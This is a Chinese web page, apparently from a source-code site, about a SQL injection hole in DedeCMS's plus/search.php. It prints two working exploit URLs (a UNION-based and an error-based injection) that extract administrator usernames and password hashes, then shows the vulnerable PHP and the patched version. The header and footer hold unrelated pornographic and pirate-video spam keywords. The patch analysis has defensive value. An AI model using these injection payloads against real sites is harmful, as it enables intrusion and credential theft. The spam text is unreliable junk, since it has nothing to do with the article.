久久久久久久av_日韩在线中文_看一级毛片视频_日本精品二区_成人深夜福利视频_武道仙尊动漫在线观看

dedecms plus/search.php注入漏洞修復及利用

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計現在很多黑闊都非常愛dedecms,因為經常有各種漏洞爆出.很多利用起來也都很簡單. 下面是漏洞的詳細利用細節: 0×1: http://www.example

dedecms的最近出的一高危漏洞,search.php注入漏洞;估計現在很多黑闊都非常愛dedecms,因為經常有各種漏洞爆出.很多利用起來也都很簡單.

下面是漏洞的詳細利用細節:

0×1:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 2 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,
pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

0×2:

http://www.example.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

報錯如果為:Safe Alert: Request Error step 1 !

則利用以下exp:http://www.example.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a
+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

漏洞修復:


20130115常規安全更新
include/arc.searchview.class.php, 搜索功能準確度優化
member/myfriend_group.php, 修復會員中心會員分組功能存在的安全隱患
plus/search.php, 修復搜索功能存在的安全隱患

登錄DEDECMS后臺會有提示,更新即可。不過貌似官方沒有提供安全更新補丁的下載地址,找了半天沒找到~

漏洞分析:

存在漏洞的文件/plus/search.php

//引入欄目緩存并看關鍵字是否有相關欄目內容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

$keywordn = str_replace($typename, ‘ ‘, $keyword);

if($keyword != $keywordn)

{

$keyword = $keywordn;

$typeid = $id; //對ID沒做任何過濾 導致注入

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));

修復之后

//引入欄目緩存并看關鍵字是否有相關欄目內容

require_once($typenameCacheFile);

if(isset($typeArr) && is_array($typeArr))

{

foreach($typeArr as $id=>$typename)

{

//$keywordn = str_replace($typename, ‘ ‘, $keyword);

$keywordn = $keyword;

if($keyword != $keywordn)

{

$keyword = HtmlReplace($keywordn);//防XSS

$typeid = intval($id); //強制轉換為數字型

break;

}

}

}

}

$keyword = addslashes(cn_substr($keyword,30));


【網站聲明】本站除付費源碼經過測試外,其他素材未做測試,不保證完整性,網站上部分源碼僅限學習交流,請勿用于商業用途。如損害你的權益請聯系客服QQ:2655101040 給予處理,謝謝支持。

相關文檔推薦

我們有時候需要對織夢文檔的點擊量進行批量維護,比如采集來的文章,點擊量都為0,需要批量修改,可以用到如下方法1。 1、在數據庫里運行下面的代碼就可以了,文章的點擊量變得
用過dedecms的朋友都知道,織夢cms后臺系統基本參數里是無法直接上傳圖片的,我們更換logo圖只能到ftp里替換,非常的不方便,我們如果想直接在系統基本參數里上傳,要怎么處理呢?
dedecms要想調用所有子欄目是沒有這個標簽的,要調用只可用sql標簽,reid表示子欄目,channeltype=6表示模型為商品,sortrank表示按排序升序.小的放前面 {dede:sql sql=Select * from `dede_arctype` where r
這篇文章主要為大家介紹了Dedecms待審核章在列表頁顯示的方法,實例分析了兩種常見的技巧,非常具有實用價值,需要的朋友可以參考下
更新文檔發現,模板文件不存在,無法解析文檔,是模板位置不對造成的, 第一個地方,就是模認模板這里,正確的。 還有第二步,就是要把高級選項這里,改成和你正在使用的模板
按原理你要想更改數據庫密碼,先要到你買的空間的更改數據庫密碼,然后在到DEDECMS data/common.inc.php 把數據庫密碼改成何你空間的數據庫密碼一樣,這樣網站才能正常顯示。但是問題來
主站蜘蛛池模板: 国产精品一区一区 | 中文字幕成人免费视频 | 羞羞羞视频| 欧美国产视频 | 男人天堂视频在线观看 | 国产91在线播放 | 中文字幕在线第一页 | 日本三级电影免费观看 | 国产精品一级在线观看 | 亚洲bt 欧美bt 日本bt | 日韩av成人在线观看 | 欧美日韩视频在线第一区 | 久久久久一区二区三区 | 成人免费视频在线观看 | 伊人狠狠干 | 欧美日韩在线综合 | 国产三区精品 | 99久久精品免费看国产小宝寻花 | 精品亚洲一区二区 | 中文字幕亚洲欧美日韩在线不卡 | 91久久精品一区二区二区 | 隔壁老王国产在线精品 | 美国av毛片| 日本中文字幕一区 | 久久久久久看片 | 日韩精品一区二区三区视频播放 | 三级视频久久 | 欧美精品电影一区 | 亚洲国产激情 | 国内久久| 粉嫩一区二区三区性色av | 欧美色综合一区二区三区 | 久久精品色欧美aⅴ一区二区 | 狠狠色狠狠色综合日日92 | 一区二区三区国产 | 91视频网 | 日韩高清在线 | 国产亚洲一区二区三区在线观看 | 91免费在线看 | 一级做a爰片性色毛片16美国 | 中文字幕一区二区三区四区不卡 |